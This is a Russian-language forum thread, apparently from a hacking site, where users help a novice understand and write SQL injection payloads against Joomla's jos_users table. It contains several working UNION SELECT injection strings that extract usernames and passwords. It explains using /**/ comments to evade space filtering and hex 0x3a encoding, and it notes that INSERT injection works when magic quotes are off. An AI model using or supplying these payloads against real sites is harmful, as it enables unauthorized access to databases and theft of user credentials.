Приветствую!

У меня проблема следующего плана, есть сформированый до меня sql запрос: /**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*

Очень хотелось бы составить свой, но меня пугают символы:
/**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*
что они означают, и как с ними разобраться, не могли бы вы помочь, или хотя бы кинуть ссылку а толковый мануал?!

Это шестнадцатеричное представление символа : (двоеточие).

Довольно странный запрос... Он в принципе рабочий? Не вижу подобраных колонок.


Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):
+union+select+1,concat(username,0x3a,password),3,4+from+jos_users
+union+select+1,concat_ws(0x3a,username,password),3,4+from+jos_users
+union+select+1,concat(aes_decrypt(aes_encrypt(username,0x3a,password),3,4+from+
jos_users
+ заменишь на /**/ если не прокатит...
PS: покажи где ты оное нашел.

_http://www.xakep.ru/post/42707/default.asp
то есть я правильно понимаю? "/**/"="+", а "0x3a"=":"
А почему тогда просто "+" не использовали?
А что означает фраза: "Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):"?
а можно вместо select insert использовать?

Нет, /**/ - обход фильтрации пробелов, "+", он же %20, он же пробел, может фильтроваться в запросах.

См. выше.

Почитай статьи по sql-иньекциям, их в интернете великое множество.

Нет, после union insert использовать нельзя.

а вообще, кроме select?

Что?

ну кроме select что нибидь можно использовать? ну там, update, delete, и т.д

Тю, я ступил, insert юзать можно, но при magic quotes = off, тоесть, ' не должны экранироваться.

экранироваться = фильтроваться? Оо